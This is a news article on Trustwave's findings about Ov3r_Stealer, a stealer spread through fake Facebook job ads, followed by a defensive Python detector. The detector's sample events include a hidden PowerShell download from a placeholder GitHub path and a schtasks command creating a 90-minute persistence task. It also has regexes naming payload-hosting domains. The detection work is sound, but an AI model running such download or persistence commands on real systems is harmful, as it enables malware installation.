
Ov3r_Stealer Malware Emerges, Targeting Facebook Users with Fake Job Ads

A Facebook job scam spreads the "Ov3r_Stealer" malware, which steals cryptocurrency and logins. The job offer lures victims to a fake document that launches a complex, multi-stage attack.


Cybersecurity firm Trustwave has exposed a cybercriminal campaign that uses Facebook job advertisements to disseminate a novel malware, Ov3r_Stealer. The malware is engineered to harvest account credentials and cryptocurrency from unsuspecting users. The Trustwave research team’s analysis reveals a complex infection procedure that begins by inviting Facebook users to apply for a bogus position. Targeted users are subsequently redirected to a malicious document, which activates a PowerShell script that pulls the malware from a GitHub repository.

Infection Mechanism

The scheme entices targets with a job opportunity for an Account Manager. Applicants are directed to a PDF hosted on OneDrive, presented as the job details. Clicking it instead triggers a redirect to Discord’s Content Delivery Network, which serves a deceptive ‘pdf2.cpl’ file. The file masquerades as a standard document but is actually a Windows Control Panel file that, when opened, executes a PowerShell payload. Trustwave’s findings reveal a multi-stage loading approach incorporating a Windows executable, a DLL used for DLL sideloading, and a document containing the malicious payload.

Data Exfiltration Techniques

Upon successful execution, Ov3r_Stealer sets up a scheduled task that runs every 90 minutes, ensuring its persistence on the infected system. The malware targets a wide array of applications and directories—ranging from web browsers and extensions to cryptocurrency wallets and FTP clients like FileZilla—to extract valuable data. The harvested data, including geographic location details and summaries of the compromised information, are transmitted to a Telegram bot.
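As an added defensive example (not code from Trustwave’s report or from this article), the following Python scans constructed process-creation events for the three observable steps described above: a Control Panel (.cpl) file launched from a user-writable folder, a scheduled task repeating every 90 minutes, and PowerShell fetching content from a public code or CDN host. The sample command lines, task name and hostnames are assumptions for illustration, not indicators from the report.

```python
import re

# Constructed sample process-creation events (not from the Trustwave report).
# Fields mirror what Sysmon Event ID 1 or EDR telemetry usually provides.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\control.exe",
     "cmdline": r'"C:\Windows\System32\control.exe" "C:\Users\alice\Downloads\pdf2.cpl"'},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'powershell -w hidden -c "iwr https://raw.githubusercontent.com/EXAMPLE/x.zip -o $env:TEMP\x.zip"'},
    {"image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r'schtasks /create /tn "Licensing2" /sc minute /mo 90 /tr "C:\Users\alice\AppData\Local\Temp\x.exe"'},
    {"image": r"C:\Windows\System32\control.exe",
     "cmdline": r'"C:\Windows\System32\control.exe" /name Microsoft.Display'},
    {"image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r'schtasks /create /tn "Backup" /sc daily /st 02:00 /tr "C:\Program Files\Backup\run.exe"'},
]

# Directories an unprivileged user can write to; a .cpl loaded from here is suspect.
USER_WRITABLE = re.compile(r"\\(Users\\[^\\]+\\(Downloads|Desktop|AppData)|ProgramData|Temp)\\", re.I)
# Binaries Windows uses to load Control Panel files.
CPL_HOSTS = ("control.exe", "rundll32.exe")
# The article names Discord's CDN and GitHub as payload sources; exact hostnames are assumed.
DOWNLOAD_HOSTS = re.compile(r"(cdn\.discordapp\.com|raw\.githubusercontent\.com|github\.com)", re.I)

def classify(event):
    """Return the name of the first rule the event matches, or None."""
    image = event["image"].rsplit("\\", 1)[-1].lower()
    cmd = event["cmdline"]
    # Rule 1: a Control Panel file (.cpl) executed from a user-writable path.
    if image in CPL_HOSTS and re.search(r"\.cpl\b", cmd, re.I) and USER_WRITABLE.search(cmd):
        return "cpl_from_user_path"
    # Rule 2: a scheduled task created with a 90-minute repeat interval.
    if image == "schtasks.exe" and re.search(r"/create\b", cmd, re.I):
        sc = re.search(r"/sc\s+minute\b", cmd, re.I)
        mo = re.search(r"/mo\s+(\d+)", cmd, re.I)
        if sc and mo and int(mo.group(1)) == 90:
            return "scheduled_task_90min"
    # Rule 3: PowerShell pulling content from a public code or CDN host.
    if image in ("powershell.exe", "pwsh.exe") and DOWNLOAD_HOSTS.search(cmd):
        return "powershell_download_from_public_host"
    return None

def scan(events):
    """Return [(rule, cmdline)] for every event that matches a rule."""
    return [(classify(ev), ev["cmdline"]) for ev in events if classify(ev)]

if __name__ == "__main__":
    for rule, cmd in scan(SAMPLE_EVENTS):
        print(f"[{rule}] {cmd}")
```

Each rule on its own is noisy in a real fleet; the point is that the three fire in sequence on one host within a short window, which is the pattern worth alerting on.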

Investigations have traced the malware’s exfiltration activities back to usernames prominent in software cracking forums, hinting at the actors’ possible origins. Moreover, code parallels have been observed between Ov3r_Stealer and another known C# stealer, Phemedrone, suggesting a derivative relationship between the two strains. Trustwave has also unearthed demonstration videos that indicate the threat actors’ possible attempts to entice buyers or collaborators for their malicious tools.

Although its origins remain ambiguous, since the associated accounts show a mix of Vietnamese, Russian, and French signals, the threat posed by Ov3r_Stealer is clear. It exemplifies the increasing sophistication and resourcefulness of cybercriminals who leverage social media platforms to deploy their payloads. Trustwave’s exposure of this threat serves as a crucial reminder of the constant vigilance required in the digital landscape.

Last Updated on November 7, 2024 10:35 pm CET

Source: Trustwave
Luke Jones
Luke has been writing about Microsoft and the wider tech industry for over 10 years. With a degree in creative and professional writing, Luke looks for the interesting spin when covering AI, Windows, Xbox, and more.
